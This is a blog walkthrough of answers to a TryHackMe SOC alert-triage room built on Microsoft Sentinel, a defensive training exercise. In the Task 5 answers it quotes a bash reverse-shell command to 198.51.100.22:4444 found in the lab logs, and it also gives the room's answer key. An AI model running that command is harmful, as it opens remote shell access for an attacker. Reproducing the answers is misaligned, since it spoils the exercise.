SOC Alert Triaging - Tinsel Triage Tryhackme Walkthrough

“Comprehensive Azure Sentinel triage walkthrough for the TryHackMe SOC Alert Triaging (AOC2025) room. Learn how to investigate security alerts, prioritise incidents with Microsoft Sentinel, and analyse logs for real-world cloud SOC skills.”


Jawstar

12/11/2025, 1 min read

Task 4: Investigation Proper

Answer the questions below

How many entities are affected by the Linux PrivEsc - Polkit Exploit Attempt alert?
10

What is the severity of the Linux PrivEsc - Sudo Shadow Access alert?
High

How many accounts were added to the sudoers group in the Linux PrivEsc - User Added to Sudo Group alert?
4

Task 5: Diving Deeper Into Logs

Answer the questions below

What is the name of the kernel module installed in websrv-01?
malicious_mod.ko

What is the unusual command executed within websrv-01 by the ops user?
/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1

What is the source IP address of the first successful SSH login to storage-01?
172.16.0.12

What is the external source IP that successfully logged in as root to app-01?
203.0.113.45

Aside from the backup user, what is the name of the user added to the sudoers group inside app-01?
deploy

Loved breaking down Microsoft Sentinel and mastering SOC alert triaging in this Azure Sentinel challenge? You’re not alone — this room is a favorite for anyone serious about real-world blue team skills! 🔍💥

If you want more in-depth walkthroughs like this, from SIEM investigations to cloud security CTFs and hands-on cyber labs, make sure you subscribe to the blog! I publish fresh, practical guides, expert tips, and exclusive insights regularly, so you’ll always stay ahead in your cybersecurity journey.

Don’t miss out — join our growing community of learners and level up your security skills one room at a time! 🚀